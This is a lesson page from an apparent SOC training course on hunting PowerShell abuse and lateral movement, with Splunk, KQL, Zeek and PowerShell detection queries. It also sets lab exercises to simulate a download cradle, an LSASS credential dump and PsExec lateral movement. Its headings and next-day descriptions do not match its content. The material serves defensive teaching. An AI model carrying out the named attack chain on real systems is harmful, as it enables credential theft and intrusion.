Day 3: Incident Response Playbooks

Today's Objective

NIST 800-61 lifecycle, containment decisions, chain of custody, and the playbook templates that turn a chaotic breach into a structured response with clear accountability.

The Threat Hunting Loop

Hunting follows a loop: (1) Create a hypothesis based on threat intelligence or ATT&CK techniques ('attacker is using PowerShell to download payloads'); (2) Investigate using SIEM queries, EDR data, or network logs; (3) Uncover new patterns — either confirm the hypothesis (escalate) or find nothing (refine and loop); (4) Inform and improve — create detection rules for anything found. Over time, good hunts turn into automated detections.

Hunting PowerShell Abuse

PowerShell is the attacker's favorite living-off-the-land tool. Hunting indicators: encoded commands (-EncodedCommand base64 parameter), download cradles (Net.WebClient, Invoke-Expression, IEX), AMSI bypass attempts, unusual parent processes (Word.exe spawning powershell.exe), and network connections from powershell.exe processes. Sysmon Event ID 1 (process creation) and Event ID 3 (network connection) are the primary data sources.

Hunting for Lateral Movement

Lateral movement leaves traces: unusual admin share access (Event ID 5140), remote service creation (Event ID 7045), WMI remote execution (Event ID 4648 with network logon), and Pass-the-Hash indicators (Event ID 4624 logon type 3 with NTLM authentication). Look for user accounts logging into machines they never normally access, especially outside business hours.

bash

# Splunk: hunt for encoded PowerShell commands
# index=windows EventCode=4104 
# | regex Message="(?i)(-enc|-encodedcommand|IEX|Invoke-Expression)"
# | stats count by host, user, Message
# | sort -count

# Elasticsearch KQL: PowerShell network connections
# process.name: "powershell.exe" AND network.direction: "outbound"
# AND NOT destination.ip: (10.0.0.0/8 OR 192.168.0.0/16)

# Zeek: hunt for DNS-based C2 (long query names)
zeek-cut query < dns.log | \
  awk 'length($0) > 50' | \
  sort | uniq -c | sort -rn | head -20

# Windows: find lateral movement with admin shares
# Event ID 5140 + specific shares
Get-WinEvent -FilterHashtable @{LogName='Security'; Id=5140} | \
  Where-Object {$_.Message -match 'IPC\$|ADMIN\$|C\$'} | \
  Select-Object TimeCreated, Message | Format-List

# Sysmon: find Word spawning PowerShell
# index=sysmon EventCode=1 ParentImage=*WINWORD.EXE* Image=*powershell.exe*

💡

Document every hunt — even those that find nothing. A documented negative hunt means 'we looked for this and found no evidence.' This is valuable data for auditors and for repeating the hunt with better queries later.

📝 Day 3 Exercise

Run a PowerShell Hunt

Generate some PowerShell encoded command events on your Windows VM: powershell -EncodedCommand [base64]
Search for these events in your SIEM using Event ID 4104 (Script Block Logging)
Enable Sysmon on the Windows VM using the SwiftOnSecurity config
Run a download cradle (Invoke-WebRequest) and search for the Sysmon network connection event
Write a detection rule that alerts on any powershell.exe process making outbound connections

Day 3 Summary

Threat hunting starts with a hypothesis and searches proactively for evidence
Successful hunts result in new detection rules to automate future identification
Sysmon event IDs 1 and 3 are the primary data sources for PowerShell hunts
Lateral movement leaves Event IDs 5140, 7045, 4624 type 3 traces
Document all hunts — negative results are also valuable intelligence

Challenge

Simulate a complete attack chain on your lab: PowerShell download cradle → payload execution → LSASS credential dump → lateral movement via PsExec. Then hunt for all four techniques in your SIEM and write detection rules for each.

← Previous

Day 2: Alert Triage & Investigation

Day 4: Incident Response in the SOC

→

What's Next

The foundations from today carry directly into Day 4. In the next session the focus shifts to Threat Intelligence and MITRE ATT&CK — building directly on everything covered here.

Supporting Videos & Reading

Go deeper with these external references.

YouTube

Incident Response Playbooks — Video Walkthroughs Community tutorials and walkthroughs covering the concepts in this lesson.

→

YouTube

Incident Response Playbooks Explained Deep-dive explanations and live-coding sessions from top educators.

→

Official Docs

Official Documentation Primary reference documentation for the technologies covered in this lesson.

→

GitHub

Open Source Examples Real-world codebases demonstrating the patterns taught in this lesson.

→

Day 3 Checkpoint

Before moving on, verify you can answer these without looking:

What is the core concept introduced in this lesson, and why does it matter?
What are the two or three most common mistakes practitioners make with this topic?
Can you explain the key code pattern from this lesson to a colleague in plain language?
What would break first if you skipped the safeguards or best practices described here?
How does today's topic connect to what comes in Day 4?

Live Bootcamp

Learn this in person — 2 days, 5 cities

Thu–Fri sessions in Denver, Los Angeles, New York, Chicago, and Dallas. $1,490 per seat. June–October 2026.

Reserve Your Seat →

Continue To Day 4

Day 4: Incident Response in the SOC

→